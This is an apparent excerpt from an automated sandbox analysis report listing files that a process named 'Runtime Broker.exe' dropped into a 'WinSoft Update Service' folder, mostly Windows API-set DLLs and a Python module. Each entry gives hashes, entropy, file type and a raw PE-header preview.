SHA-256:	AF4379FDC8BD41F7A8A4B509DE949202CCDB5E4825797D7A5DDDD5E77671382C
SHA-512:	FE5D9C3FF4469647AFD20FFA43EBFDADA0516576117C51D03EB8960A81516425FD110E2F6978CF98D279E3912C2A9C1D42C4C39900E183B1F08C2272ECEB00B7
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l...l...l.......l...m...l...o...l...i...l...h...l.5.m...l...m...l...m...l...m..l.5.d...l.5.l...l.5....l.5.n...l.Rich..l.........................PE..L...N.:_...........!................................................................2.....@.........................p...d............................p..........P.......T...............................@............................................text.............................. ..`.rdata...p.......r..................@..@.data....;...0...8..................@....gfids.......p.......J..............@..@.rsrc................L..............@..@.reloc..P............X..............@..B........................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\_tkinter.pyd Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	53264
Entropy (8bit):	6.62090696064469
Encrypted:	false
SSDEEP:	1536:LuLHIWO0ng0ukV6hcAT9xIpI8sStqZIyu:LQImfFAT9xIpI8sStq8
MD5:	D8BEF3883F3E58C6257C43B059F652B0
SHA1:	50AA092861B518FEC5EFFE3D1D3FD37FDD2CEB9E
SHA-256:	80BFB1A85F5DE28B084DEC0A6FF3B89C90FE68979E863ED0C52397C77B6E6A20
SHA-512:	B7BD89BB112DFC598AF346A017662BDE854F7A214B8681BD113212FC922069FF5B37238A89C734C0EDB994A2A9F3720E346C5FE7B7B174798769FF7412F991BD
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........zK[v..[v..[v..R..._v..`(..Yv..`(..Zv..`(..Pv..`(..Pv...(..Yv......Yv..7...^v..[v...v...(..Yv...(..Zv...(..Zv...(..Zv..Rich[v..........................PE..L...M.:_...........!.....h...N......2i....................................................@.........................p...P...............................................T..............................@...............4............................text....f.......h.................. ..`.rdata...#.......$...l..............@..@.data...............................@....gfids..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-console-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	3.1545129199010966
Encrypted:	false
SSDEEP:	24:ev1GSsYe3SIqi9rWHvSMjUW5V2d+Wf2IZW0HKNVKuV9h7r35WWdPOPN8:qNIqzv3f5VG+pIZWUcVNh/5Wwa
MD5:	E33715B9DE1A50976A856333063213F7
SHA1:	1E5CB780E1438B5AC54F9DF537D5178F136AB34D
SHA-256:	08338379C7C353CD383C89E383A53C714943AAF8D455232EA466D568110477B2
SHA-512:	BE12D0A47C5F4D84600C71028CC043F67ACB6418AF56EE1FFF007E12348BB90DA67874F907229739F37597D68A735679DAD0B7ED11EB25EFBE2D8E570854ECF0
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?...{..{..{..r._.z..r.N.y..r.Y.z..r.\.z..Rich{..........................PE..L.....[J...........!......................... ....@..........................0......Q.....@.......................................... ...............................................................................................................text...b........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-datetime-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	2.628092327649302
Encrypted:	false
SSDEEP:	24:ev1GSsBngHOCuatQ+lxM+Wf2IZW0HKNVKuV9h7r35WWdPOPN8:qigHtVtQKM+pIZWUcVNh/5Wwa
MD5:	4E980EE831C4A37D39D68F7C4A2E52D0
SHA1:	680B482656924DF760C724647322BA83494EA6CE
SHA-256:	23DE107AAB8EA386A1ED1E0BFF84F5E20146C5F1FE608BA34E7C905725F4394D
SHA-512:	087D7D1F67D94D25DF9095D4834D2314DBDA5EE75C529F8EE977CED267545BB5D12009EFB4B7DD84BA2A401B53BD01031CC86702EAD8F9BD8540E347099B2A20
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?...{..{..{..r._.z..r.N.y..r.Y.z..r.\.z..Rich{..........................PE..L.....[J...........!................g........ ...............................@.......!....@.......................................... .......................0.......................................................................................text...0........................... ..`.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-debug-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	2.686239060362944
Encrypted:	false
SSDEEP:	24:ev1GSsaKgzOnsLdZpWf2IZW0HKNVKuV9h7r35WWdPOPN8:qGgzag3ppIZWUcVNh/5Wwa
MD5:	014B7858940FBD56C4DDF47BFD014BFA
SHA1:	78FDA2FEC2BD742D1A71E3B51DE75AF183641793
SHA-256:	759D46DFBA283DCC604FD8DBABDC8477277D471C0730270CBEC52AF0CB615017
SHA-512:	EFC3D9D3679FED4093DC6D9947EE05A4B646152B00F88EA2D6A4C02CEB38A72671FA8DE52E52B243E1EADD5299DA93705518A0F3913114853E95C4D5A0F7B1C0
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?...{..{..{..r._.z..r.N.y..r.Y.z..r.\.z..Rich{..........................PE..L.....[J...........!................p........ ...............................@......i.....@.......................................... .......................0.......................................................................................text...D........................... ..`.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-errorhandling-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	2.8721901197908477
Encrypted:	false
SSDEEP:	24:ev1GSsncBgQOgN37MYpRydQRMeU47v7qWf2IZW0HKNVKuV9h7r35WWdPOPN8:q+ggQpnyaDupIZWUcVNh/5Wwa
MD5:	A6E015AD176DCB379335DDB54D165F7E
SHA1:	DFDA593AA112CB08188EF88C7FD75E6A143BD7C1
SHA-256:	376E175984D6EB03BBB4695DF347A4410FFC573BB6FB5EF8CA3BF160F53C0AFA
SHA-512:	38B0599A3DC2644B4D158835883883BD84890F8E65B33C10CD2F2011BE3964E72C43D0C153C82289C06C427EF27D674C96AD3E55C65FE816B59B8800DFC42686
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?...{..{..{..r._.z..r.N.y..r.Y.z..r.\.z..Rich{..........................PE..L.....[J...........!......................... ....@..........................@.......Z....@.......................................... .......................0.......................................................................................text............................... ..`.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-file-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5120
Entropy (8bit):	3.943005354291736
Encrypted:	false
SSDEEP:	48:qJg7lOml3CQLHPGfN8AKAphHB9EiEsX0/FjNLUaCpIZWUcVNh/5Wwa:xOKCc7v0xB9EiEsX0/Fj6aUEW37hWw
MD5:	9BEBF5E9049909662ECDD447A3B80232
SHA1:	8DE896787D7E17AE22B0B8A1CCD05ABA84A1CAB2
SHA-256:	DA7058EAAB2466909A06D90B2F0523484333E1E505639ABEA29E9983A659A27E
SHA-512:	146956EA913FB38750529519D4D09045E98760E00FBBEDF644528D69BE3335D74DE2A8B10DDB43F44D3F77DF06760C724931A8B286A84958F989DCFD8A209BB7
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?...{..{..{..r._.z..r.N.y..r.Y.z..r.\.z..Rich{..........................PE..L.....[J...........!......................... ...............................@............@.............................l............ .......................0.......................................................................................text...<........................... ..`.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-file-l1-2-0.dll Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11616
Entropy (8bit):	6.621842442598499
Encrypted:	false
SSDEEP:	192:gW+NhWsT71ojDBQABJJslqnajxcRGlP6ZqgCJ:gW+NhWBDBRJulll7P6glJ
MD5:	04C39B760247C6EED86854F657833347
SHA1:	9490B9DCD3F91B06FA7F3028DC5DF5B4A22D4FBC
SHA-256:	F56B749C01CC82118FFE538674DF22A1F4EF7A07E94E559D25F55CE104E7B095
SHA-512:	5A5C9E8A1E41C4FB9AA6C0A50B60D14E4E727D951EADC3C1D475A905EA5FA5FCEE8F801163206ED2A8FF651506CEBCCE9611AFAFBB3C7952CE9790F6E292E2B6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L...T..U...........!......................... ...............................0...........@.............................L............ ..................`!..............8............................................................................text...\........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-file-l2-1-0.dll Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11616
Entropy (8bit):	6.732576257231425
Encrypted:	false
SSDEEP:	192:YfW+NhWtT71ojDBQABJiz2DHqnajxcRGlP6Zqoclg:YfW+NhW2DBRJiz2DHll7P6goeg
MD5:	8403E7B9EC4B0C4F6C9BF0EC93687C77
SHA1:	7581E7D872EC9C00F33BDAC9690E55096DB30172
SHA-256:	A8B79E230A81102735996500DD00D34BFA77955C11D87C0F9C967EC85003E116
SHA-512:	A1017A6115C9375AE0EE5CCC40DCF354DBE1ED3067C027C99F3D4B4045C9AD50ECB833E587579153F6B819ABD27399BFE8F47BD0B898B1F1C901AB3D4A8BC146
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L...V..U...........!......................... ...............................0............@.......................................... ..................`!..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-handle-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	2.723916777065076
Encrypted:	false
SSDEEP:	24:ev1GSs/ygq2OE+rWxRwcd7e2HWf2IZW0HKNVKuV9h7r35WWdPOPN8:qdgq2jRwipIZWUcVNh/5Wwa
MD5:	D37696B67EF1316CEF238542BFD7FB9A
SHA1:	B2463165AD35EB739DA021889253A9D78585B598
SHA-256:	01DABF204E1349AAD1A04A6A70685F739DEABE5C022B26E184C1622F160A138D
SHA-512:	4BC575384E23B27A001D545AD3594DB94F1EE5C911DC60950330CE9AEF37D8B517B8FDEF5C254BF9395558BD4E2371252A0A90E17DAC439C88A7239E755D79F9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?...{..{..{..r._.z..r.N.y..r.Y.z..r.\.z..Rich{..........................PE..L.....[J...........!......................... ...............................@............@.......................................... .......................0.......................................................................................text...X........................... ..`.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-heap-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.8173151168397514
Encrypted:	false
SSDEEP:	48:q48gUG8XGRFx9A/MmKOpIZWUcVNh/5Wwa:PL8XG/rQK4EW37hWw
MD5:	F40ABA6CFCCC038B547BDC5F18A9DA67
SHA1:	555A1C76E6E41520093201E7394E68EBBDD62D8B
SHA-256:	3F567BE8A2B5D27E333BF328F10058BD8C21D7CEA453777A63A1C27A0BF0C7E7
SHA-512:	85F2953985B4EB4B1204364A2E8C405C67E8D563A8A4803DFD6F8EEB45A96DE98C0E0254C240C89F0F2CD38140E8902C982DFDD8E0782CFFB572320D36EBB1EB
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?...{..{..{..r._.z..r.N.y..r.Y.z..r.\.z..Rich{..........................PE..L.....[J...........!......................... ...............................@............@.......................................... .......................0.......................................................................................text...`........................... ..`.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-interlocked-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.9219365490318805
Encrypted:	false
SSDEEP:	48:qRRwEgCCfx64pXT2dcdTuLlpIZWUcVNh/5Wwa:GUfxfXes2EW37hWw
MD5:	213C3721235456B85D5F4EFD825F5A4F
SHA1:	B0AEA277F1EA549AC6778436FDCAD9EE2BDDA442
SHA-256:	51B8BE1B4BD374A1EC7849E4723285D4662F4BBA7F2609DA63178B94D7A1D286
SHA-512:	BAB0AF150F069F33C532AC7606B368291978C4F76333F288253B2EF26ED003F39DD33422FDCF5A9AD2DE155C0A7B15B525B66C2F1FB1BD6F6F96BD355906DD18
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?...{..{..{..r._.z..r.N.y..r.Y.z..r.\.z..Rich{..........................PE..L.....[J...........!......................... ....@..........................@............@.......................................... .......................0.......................................................................................text............................... ..`.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-libraryloader-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	3.1434835107977737
Encrypted:	false
SSDEEP:	24:ev1GSsjggoIbG0YurWy+8dGUjNncwzX81dhwSTrD46Wf2IZW0HKNVKuV9h7r35We:qLgon8nhzX8GEpIZWUcVNh/5Wwa
MD5:	22E6BFE28C28C0641346F7A325EE2D35
SHA1:	CF0EE5942B9EB9BF18D6CC580201C3D4CC7ACB31
SHA-256:	D6B5F42E412227FD40BA753CB9B647564E43E49B0CA76D711EE1F36AF43B89D0
SHA-512:	66B28C94C72DE4ED56798852DE0AA7CA3CA782D95139393A28102088AF5478CDC7EAEE6267070FE8B81219FC42E83649138EE630DDCEB8B15E5838E17ECB9426
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?...{..{..{..r._.z..r.N.y..r.Y.z..r.\.z..Rich{..........................PE..L.....[J...........!......................... ...............................@............@.............................c............ .......................0.......................................................................................text...#........................... ..`.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-localization-l1-2-0.dll Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	14176
Entropy (8bit):	6.666102384903856
Encrypted:	false
SSDEEP:	384:nVOMw3zdp3bwjGjue9/0jCRrndbVW+NhWUDBRJUll7P6gQn:nVOMwBprwjGjue9/0jCRrndblN11PMYn
MD5:	2E2C78125C66CDE5859559F5E6167034
SHA1:	F00E9CDD8DA93106FB3BC060E64C643E2274A598
SHA-256:	9BF2BFF3ADCB1FB5707794B18320D7113F45446DD505EEE43ABBF8835CD73A44
SHA-512:	9BC9158284DEDD0DFF361B7F4EC3BF32B2915D4AEAFF5A8D8ED51CCDC1E34EA5D3781343C489614EEBD02323D6926A865AB94D3EFD6EF6F34779364AC1752E1E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L...T..U...........!......................... ...............................0............@.......................................... ..................`!..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-memory-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.9143201358004376
Encrypted:	false
SSDEEP:	48:qoZgvqmtwAmSmiDhTqXFLpIZWUcVNh/5Wwa:zmwIiEW37hWw
MD5:	75987C7EF7B36676E46629D381CD6620
SHA1:	4979337A3534FC490D33F097BBE4FF5D5DF7559F
SHA-256:	9D2FEE0916190C515423F3118125D1047F8F7718550ED7540C531374667500FE
SHA-512:	C3700152DA81294BD30904D49BACEBEC3A81F461C8B06D255F0AEEF1F0026EB8C444A2828C24EC416ADE0F6A8DB899CDC632C5D3ADC005C420195E08990CCF3D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?...{..{..{..r._.z..r.N.y..r.Y.z..r.\.z..Rich{..........................PE..L.....[J...........!......................... ....@..........................@.......X....@.......................................... .......................0.......................................................................................text............................... ..`.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-namedpipe-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.847410496520587
Encrypted:	false
SSDEEP:	24:ev1GSsJm1CgIIRo+fWzWHWumSqxt6IgXuDGWf2IZW0HKNVKuV9h7r35WWdPOPN8:qrCgIio+fLoGpIZWUcVNh/5Wwa
MD5:	4C32727ED601CFD0AE83FC856E40EC11
SHA1:	31821ED85DE0ED3976D6FD4C4A0C3E4AC77BAD88
SHA-256:	AA80053CDFD417BE9D0E03623B88E14F2F4ABD8E863CF9E557D02A42DDC4DD34
SHA-512:	30F178AF9C676C7F94C84A3CEAA4455382F13D4B57AEED961EDF7D3AE34B0D47C163C825684DE416FD3F9025B46B1A9D130731CB70F69F4ADB4C54B367DAACFF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?...{..{..{..r._.z..r.N.y..r.Y.z..r.\.z..Rich{..........................PE..L.....[J...........!......................... ...............................@............@.......................................... .......................0.......................................................................................text...d........................... ..`.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-processenvironment-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	3.3272488153906172
Encrypted:	false
SSDEEP:	48:qHHgZz/SISSpk6/DW2kpIZWUcVNh/5Wwa:CKDkEW37hWw
MD5:	D288E16D91E695630945514D988EFD21
SHA1:	92140DD954317C7A56D04D36DF32F3337F2B7B06
SHA-256:	69A407A3139F270E6389DA243890AD362D1976DB4BA997BA83081B50EA1234C6
SHA-512:	122F61CCBBB38A0601D3D8D45A4AF40E01B324B82C084F92A26F4F9A22FC5FF7BE27386C46A99D5D465D77F4FBC9E1F9911EAD1BB5E6DADAD2C14B90A62234E8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?...{..{..{..r._.z..r.N.y..r.Y.z..r.\.z..Rich{..........................PE..L.....[J...........!......................... ...............................@.......N....@.......................................... .......................0.......................................................................................text............................... ..`.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-processthreads-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.6352080644749525
Encrypted:	false
SSDEEP:	48:qCBg3IVBSeIfVkfWeKB+vpgge6gig8YSzYFTdshgW9M2PkSVpIZWUcVNh/5Wwa:NaeeuYFT4ssEW37hWw
MD5:	1F451195A8ABD3D8D0F1FD8E7051E713
SHA1:	7267752C6942980D9EC17E5E7535CFC6FA438322
SHA-256:	B59BCF40DABBE99E57269D5C70B7A005E4A11010A55FCEACBCBAB75AC609ADF9
SHA-512:	17F56AA92B9720E04D8B702CFEB24B69ED92C4578C6525DD3AE3BD4BCF1BB270193391CF6332C4189FC8EF5895AA07C44A73217C4BE2B7A41B8841109E4BB94A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?...{..{..{..r._.z..r.N.y..r.Y.z..r.\.z..Rich{..........................PE..L.....[J...........!......................... ....@..........................@............@.......................................... .......................0.......................................................................................text............................... ..`.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-processthreads-l1-1-1.dll Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12128
Entropy (8bit):	6.653410102607609
Encrypted:	false
SSDEEP:	192:XDfIe5W+NhWCT71ojDBQABJhfZqnajxcRGlP6Zq+0:XDfIe5W+NhWzDBRJhhll7P6gf
MD5:	5EFD5F4B617E95043898DBFD78AF97FB
SHA1:	70BABD7098B05C59484A9DBEA77F4B5DCD2BF9CC
SHA-256:	CFCEFC5AF3F7A37242DCDBFEBEDBB954A0D21D93175441BCE680A1A4C1C9FEF3
SHA-512:	D09444A042E18655F1B994D0552DB0478206DC1901557FDD9F58DF5FBA58654007BEEEDFB185F6D5958A25F287ECDE84F5173C4CD34CEB8A9D507FA7F9D027BE
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L...T..U...........!......................... ...............................0............@.......................................... ..................`!..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-profile-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	2.5855045556640204
Encrypted:	false
SSDEEP:	24:ev1GSs7HCEgeO4WTxRWf2IZW0HKNVKuV9h7r35WWdPOPN8:qMgeOpIZWUcVNh/5Wwa
MD5:	EE6D500CF33BA97E97B8B83917F90781
SHA1:	648CA133DB6DD3011F7ABE8D595B01637E764E24
SHA-256:	4C686790658CD21277C9D2A881541EA01EA287020C2DA86A9A1C85CE55970843
SHA-512:	525D97654BD3AD6A5A7EE0ADFA663BAFFEFEAA49A818C366605CA4E71F9817C62F889843F6EDAA18567E0DFDD46FA0EF1BB68E657E09B884F64591B384217BD1
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?...{..{..{..r._.z..r.N.y..r.Y.z..r.\.z..Rich{..........................PE..L.....[J...........!................f........ ...............................@...........@.......................................... .......................0.......................................................................................text............................... ..`.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-rtlsupport-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	2.726107672155573
Encrypted:	false
SSDEEP:	24:ev1GSsMtg2Obxq/vgTvvOX3L/4Wf2IZW0HKNVKuV9h7r35WWdPOPN8:qvg2aOvgsL4pIZWUcVNh/5Wwa
MD5:	6C614941F33DC339C0D7A975DF670B02
SHA1:	AAD98738314CA4D0E8B54D97EF14DB159E8A6133
SHA-256:	C90D38627F5947DD106BD968F94BE0F7857CE2DA386741CCDB96D3C523865327
SHA-512:	A082535E0720B28FB8BB779A3FA3DFA27AA00312178321433FA25778B81A9080CF1C25ABEEABDDF801CD0C91552BAECE69A3C2B883C00C8BDC0358477B75D22F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?...{..{..{..r._.z..r.N.y..r.Y.z..r.\.z..Rich{..........................PE..L.....[J...........!......................... ...............................@......-.....@.......................................... .......................0.......................................................................................text...Y........................... ..`.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-string-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	2.955032765211863
Encrypted:	false
SSDEEP:	24:ev1GSsF0EgNOVznHWqSzqP2LEKJMwidP+Wf2IZW0HKNVKuV9h7r35WWdPOPN8:qAgNgzHzPUEKJMBQpIZWUcVNh/5Wwa
MD5:	6E880ACD975CC182592E6B3DBF36AC77
SHA1:	70BF9646DAD49AF0B7E227CC3254374A52527B19
SHA-256:	FCEB04DE3FAD241D17F8F9D76E055BBCDD19EE3CB66918707767DC819BC779F9
SHA-512:	835307DB5DC00AF3C547939E1E65BF187115988282CE7916935BFFAF4640AF6A31EF91E6970B7C9EDA9B8FD5752EFF13DA2034A23B6DEE90CADA368F95A80BF7
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?...{..{..{..r._.z..r.N.y..r.Y.z..r.\.z..Rich{..........................PE..L.....[J...........!......................... ...............................@............@............................."............ .......................0.......................................................................................text............................... ..`.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-synch-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.7055207529972756
Encrypted:	false
SSDEEP:	48:qrg1RU4EaC1nFLrNLZoVdt6zsSpIZWUcVNh/5Wwa:9b01ntZOV76zskEW37hWw
MD5:	692249028DFCE4B6142FDCC3B3BA022C
SHA1:	E540B80587F33BA75D7BD0A8A4722D7E7C620650
SHA-256:	82AB47DE74F08FE422022CDA9A3AB14A20C4BF7EFBDBABC02D93A1586D332179
SHA-512:	FC021A3FF5798EA95080A27723135204FB350C4DE4D32A2716F55444778921AC4C441F854A8CF38CD44FAA6129D83FFBDFFE838DB1943F9C6B19D73A0C7AB421
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?...{..{..{..r._.z..r.N.y..r.Y.z..r.\.z..Rich{..........................PE..L.....[J...........!......................... ....@..........................@............@.......................................... .......................0.......................................................................................text............................... ..`.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-synch-l1-2-0.dll Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12128
Entropy (8bit):	6.70147970942801
Encrypted:	false
SSDEEP:	192:wttZ3IW+NhWuT71ojDBQABJCxXqnajL1dHx3tKPDGHqH:ctZ3IW+NhWfDBRJCdlXBtgkqH
MD5:	FD9C6D2E90B3CF9C0D72F59B66EA1989
SHA1:	92BE1C1C7BC81E2EAEB22FDCE5946A0FB08E45F2
SHA-256:	05482DBB67F005E0B61BBD44CE04818254FFECB765F836324BBCB3DD174524FE
SHA-512:	423CA76AFB7DC56A15AD245396B823ED338173D8BA23D91EC86D5743EBC53833C3A5A2B6CCD9599580D9AFDD5250294BE48D07A7C1A13D89607CBD8266DF8B50
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L...T..U...........!......................... ...............................0.......8....@.............................v............ ..................`!..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinSoft Update Service\api-ms-win-core-sysinfo-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4096
